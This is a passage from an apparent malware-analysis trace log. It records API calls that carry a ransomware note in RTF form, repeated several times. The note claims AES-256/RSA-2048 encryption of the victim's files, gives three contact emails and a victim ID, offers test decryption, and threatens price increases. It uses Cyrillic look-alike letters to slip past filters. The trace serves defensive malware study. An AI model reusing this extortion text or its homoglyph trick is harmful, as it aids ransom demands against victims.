y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.460] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.460] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 